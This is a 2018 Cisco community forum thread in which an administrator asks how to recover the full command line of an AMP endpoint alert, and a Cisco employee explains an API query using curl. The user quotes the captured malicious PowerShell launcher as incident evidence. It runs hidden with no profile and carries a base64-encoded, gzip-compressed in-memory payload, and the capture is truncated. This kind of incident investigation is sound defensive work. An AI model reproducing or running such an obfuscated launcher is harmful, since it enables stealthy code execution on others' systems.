Buy or Renew
Buy or Renew
Duo Security forums now LIVE! Get answers to all your Duo Security questions. Learn more
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Start a conversation
5058
Views
5
Helpful
2
Replies

AMP Truncated Command Line Arguments - Generic IOC: W32.PowershellEncodedBuffer.ioc

newbieftd
Level 1
Level 1

‎08-02-2018 02:06 PM - edited ‎02-20-2020 09:05 PM

Is it possible to get the complete command line arguments from the AMP event?

 

We have an encrypted (base64) powershell command that was executed on our network, but AMP truncated the input.  Without the entire command we can't recreate the issue.

 

Partial input:

C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -e JABzAD0A.........................................

 

Thanks-

Labels:
0 Helpful
2 Replies 2

Matthew Franks
Cisco Employee
Cisco Employee

‎08-03-2018 07:24 AM

Lang,

 

You can use the AMP API to pull the full information.  Go into your dashboard if you do not yet have an API key and you can establish one under Accounts > API Credentials.  You will need Two Step Verification enabled on your account to enable Command Line Capture for your API key.  Once you have your Client ID and API Key (both provided when you set up the API Credential, go to the computers page and pull the GUID for the computer with the event you're looking for.  With that information, you should be able to run the following command from CLI to pull the events for that connector.

 

curl -X GET -H 'accept: application/json' -H 'content-type:application/json' --compressed -H 'Accept-Encoding: gzip, deflate' -u <insert_client_ID_here> 'https://api.amp.cisco.com/v1/events?connector_guid=<insert_connector_GUID_here>'

 

Once you run this command, it will prompt you for the password.  Enter the API key as the password. The output will contain the last 30 days of events from that connector.  You can search through the output for the IOC event and should be able to find the full command line capture.

 

Thanks,

Matt

newbieftd
Level 1
Level 1
In response to Matthew Franks

‎08-08-2018 04:33 AM

Thanks Matt - this process it good to know and "worked", except the result was the same I am seeing in the AMP GUI. It is a base64 string creating a powershell in memory object.



Here is what I am capturing (both in GUI or CLI) - if you decode the first string, you get the second, but it is incomplete (as the base64 decode complains about).



"command_line":{"arguments":"C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\\\syswow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcASAA0AHMASQBBAEwAWABpAFcARgBzAEMAQQA3ADEAVwBiAFcALwBhAFMAQgBEACsAbgBFAHIAOQBEADEAYQBGAGgARgBFAEkAQgBrAEoARABFAHEAbgBTADcAUgBxAE0AbgBVAEEAQwBPAEIAZwBJAFIAYQBmAEYAWAB0AHMATABpADAAMwBzAE4AVwArADkALwB2AGMAYgA4ADkASwBrAGIAWABMAFgAdQA1AFAATwBBAG4AbABmAFoAbgBaAG0AbgBuAGwAbQB4ADIANABTADIASQBLAEYAZwBUAFQAcABWAHQAcgBKAHQAawBYAGEAMABwAGYAMwA3ADAANwBhAEoAQwBKAHoAUwBjADUAUQBmADMAdAAxAFMALwBKAFMAWgBuADMAWgAwAGYAQgBqAE0AYwA2AGQAbgBNAEIAMgB4AHMATwAwAFgAdQB2AHEAbABZAG4AMABTAFoASgBIAGEATABHAG8AaABYAFAAQwBnAHYASAAxAHQAWgBwAEUARQBRADMARQBmAGwANQBvAFUASQBIAGkAbQBNADQAbgBuAE4ARgBZAHoAawBsAC8AUwBIADIAZgBSAHYAVABzAGYAagBLAGwAdABwAEMAKwBTAEoAbgBmAEMAdwAwAGUAVABnAGcALwBpAEcAMQBVAFkAdgB0AFUATwBrAE8AQgBrACsANAAxAFEANQB1AGsANwBoAFgATQBCAFcAZABDAHoAbgA3ACsAbgBNADIATgB6AGsAcgBqAFEAdgAwAHAASQBUAHkAVwBzACsAWQBtAEYAbgBSAGUAYwBEAGoAUAA1AHEAUwB2AHUAZABUAGcAdwAyAFoAQgA1AFcAeQBMADIAVgBFAFkAaAA2ADQAbwA5AEYAbAB3AFgAaQA3ADAAZwBwAGkANAA5AEEANQBPAFcAOQBJAFcARgBYADcAbwB4AE4AawBjAGgAQQBLAC8AaQBJAG8AawBDAHEAVABuAG8ATgBKAFQAOQBqAEoAeQBGAG8AYgB0AEsATABTAFIANAAwAFEAMABCAHAAVwBDAEUAUwB6AEQARwBaAFUAegBRAGMASgA1AFgAdgBwAE4ASABoADEAYwA2AEMAYQBCAFkASABNAEsAKwA0AEoARwA0AGMASwBrADAAWgBMAFoATgBDADcAbwBKAEgAQQA0ADcAVgBKADMATABOAC8AUgAxAFQASAB5AFgAMQBXAFMAWAB5AHEAQgBWAEYAdABFAHUAVAB3AGsANQBpADEAZgBXADYARwBUAGMATABwAFgAegArAFoAKwA5AHYAYQBRADAAUgB3ADgATAA3AE0ASwBTAEgAeAA5AC8AKwA3ADkATwAvAGQASQBoADcAWABhAEMARgA0AHkAQQBVAFkAbgBvADkAMgBZAGcAcQBkAHkATwA0AHoAWgBUAHUANgBUAFYATQB4AEwATABUAEIASABSAEIAaAB0AFkASgBwADUAaQBCAEsAYQBHADAAdQBqAE4AQQAyAGoAOABWAGoASwBSAE0AVAA1AHEATgA1AGMAVgBtADcAeQBiAHgAOQBTAE8AbQBxAEEAZgBNAEsAeAA0AFMAeQBYAGQAMQAwAFAATgBrAFoAVwB5AEoAdwB4AEsAQgA1AHkAbABaAGsAbgB4AFgAVAA1AGIAYwByAFYAcQBNAHMAQwBXAHQAcwBFAFoATQA3AHMASQA2AHYAawAxADcAQwBuAEwAcQBlADcAYQBBAHQASABzAFQAdgB3AFQATQA0AGUATgBxAGgAVABvADUAeAA2AFIASwBSAEEANQBxAFgAUgB6ADIAcgAxAE8AUgBQAGYAZABIAEgAQwB1AEUATQBqAFoARQBQACsAWQB2AEEASwBVAHAAdgA3ADMAcABsADkAYgB1AFMAcwBFAGIAVABvAEgATgBEAGEAegA3AE8AUQBCAHgAZQA0AFQASQAvAFMAQgAvADUAdQBqAHQAYgBUAE8AUQBoAGwAVgBVADcAaQBPAEMAKwAxAEUAeQBnAG0ATwB5ACsAWgBsAEgARABxADUAQwBVAFUAeABPAHkAdwBoAFIASQBSADcAbwBiAFoAWgAzAGQAYgBDAFIAZgBNAEoAcgBFADQASABqAGYATwBIAFcAQQA4AG0ARgBQAEQASQBCAFoAUgBZAGsAUAArAEkAUABRAEgAYwAwAEYAdABSAG4AaQBLAFIARgA3AFMAbQBVAFAAeAB4AG0AVABlADAAVwB6ADIAVgBSAHgAVQB3AGoAawBMAFAARABoAHAAQwBYAG0AQQBsAFQAUgArAFUANgBTAHMAaQBNAEQARABaAHcAYgBrAEMAaQBZAFYAeABuAHoAQgA2AFIAdwBFAGQANQBXAHQAYwBlAEoAQgBIAFIAOABLAFkAYwBjAGwANABsAEUAbgArADQATwBYAFIANAByAHYAKwBaAHoAQwBjAGMAVABoAGgAWQArAFEAWQA1AE8ASABJAGkAOQBaAEwAQgBKAHcAUAA2AFQAUQBQAHIAUABwAFAAegBqAHkANABwAEoASQBYAFYASQBqAGUAcwBpAEwAZgBDAHkAYwBFAGQANgBJAGwATwA0AFoAYgAxADYAKwBUAEEAbAA2AFEARwBtAEgAUwBTAFEAQQBEAHkAMABLADUANQBqAEUAOQBLAEoAaQBpAGcAagBRAGsAagA4AG8AOQAwAHgARgA4AEEAeQBOAGcATABkAHMAUABHAE0AbAB0AEcASQBsAG8AdwBYAC8ASABqAHMAMwB3AGwAcgBWAHUAYgAyAFoANgBrAHAAVQBXAC8AcwB1AE0AbQBLAGoAcABiAGQAcgBIAFYAMgB2AEwARwA5AE0AcQB5AEwATQB1AGkARgB1ADIANABaAG8AMQBRAGYAVABxAFkAbgAwAGIAbQA4AG8ASABnADIAawBQADcARABpAGIARgBqAFoATABtADcAWQAxAG0AdwBpAFoANwBoAFcATAByAFoANAB1AHkAcgBpADkAWABiAHEATwBlADYAdwA1AHIAcABlADEAVABXADcAcABZADgAYQBhAC8AYgBWAEQAaQA2AFcAUwBiAE4AVwBUADUAcAA5AHYATQBMAEYAUwBsAHgAbgBLADcAMwBEAGUAcAAzAFoAagBTAFkAbQBRADQAdQBUAG4AcQB0ADQAZwA5AEkAVgBZAGUAdABtAE4ATABWAEsAWQBXAHQAcgBJAE4AVAB3AHoAKwAzAHQAagBXAHMAMQAvAEoAYQB6AEcAZQByAEsAVgBiADgAeQBRADMAVwBFADEASwBCAHUAYQBUAGkAOABIAGUASQBJAHQAUgBXAEwAZQBGAGIAWQ (Decoded [truncated]: $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALXiWFsCA71WbW/aSBD+nEr9D1aFhFEIBkJDEqnS7RqMnUACOBgIRafFXtsLi03sNW+9/vcb89KkbXLXu5POAnlfZnZmnnlmx24S2IKFgTTpVtrJtkXa0pf3707aJCJzSc5Qf3t1S/JSZn3Z0fBjMc6dnMB2xsO0XuvqlYn0SZJHaLGohXPCgvH1tZpEEQ3Efl5oUIHimM4nnNFYzkl/SH2fRvTsfjKltpC+SJnfCw0eTgg/iG1UYvtUOkOBk+41Q5uk7hXMBWdCzn7+nM2NzkrjQv0pITyWs+YmFnRecDjP5qSvudTgw2ZB5WyL2VEYh64o9FlwXi70gpi49A5OW9IWFX7oxNkchAK/iIokCqTnoNJT9jJyFobtKLSR40Q0BpWCESzDGZUzQcJ5XvpNHh1c6CaBYHMK+4JG4cKk0ZLZNC7oJHA47VJ3LN/R1THyX1WSXyqBVFtEuTwk5i1fW6GTcLpXz+Z+9vaQ0Rw8L7MKSHx9/+79O/dIh7XaCF4yAUYno92YgqdyO4zZTu6TVMxLLTBHRBhtYJp5iBKaG0ujNA2j8VjKRMT5qN5cVm7ybx9SOmqAfMKx4SyXd10PNkZWyJwxKB5ylZknxXT5bcrVqMsCWtsEZM7sI6vk17CnLqe7aAtHsTvwTM4eNqhTo5x6RKRA5qXRz2r1ORPfdHHCuEMjZEP+YvAKUpv73pl9buSsEbToHNDaz7OQBxe4TI/SB/5ujtbTOQhlVU7iOC+1EygmOy+ZlHDq5CUUxOywhRIR7obZZ3dbCRfMJrE4HjfOHWA8mFPDIBZRYkP+IPQHc0FtRniKRF7SmUPxxmTe0Wz2VRxUwjkLPDhpCXmAlTR+U6SsiMDDZwbkCiYVxnzB6RwEd5WtceJBHR8KYccl4lEn+4OXR4rv+ZzCccThhY+QY5OHIi9ZLBJwP6TQPrPpPzjy4pJIXVIjesiLfCycEd6IlO4Zb16+TAl6QGmHSSQADy0K55jE9KJiigjQkj8o90xF8AyNgLdsPGMltGIlowX/Hjs3wlrVub2Z6kpUW/suMmKjpbdrHV2vLG9MqyLMuiFu24Zo1QfTqYn0bm8oHg2kP7DibFjZLm7Y1mwiZ7hWLrZ4uyri9XbqOe6w5rpe1TW7pY8aa/bVDi6WSbNWT5p9vMLFSlxnK73Dep3ZjSYmQ4uTnqt4g9IVYetmNLVKYWtrINTwz+3tjWs1/JazGerKVb8yQ3WE1KBuaTi8HeIItRWLeFb)"}



Thanks -
0 Helpful
Getting Started

Find answers to your questions by entering keywords or phrases in the Search bar above. New here? Use these resources to familiarize yourself with the community:

Customers Also Viewed These Support Documents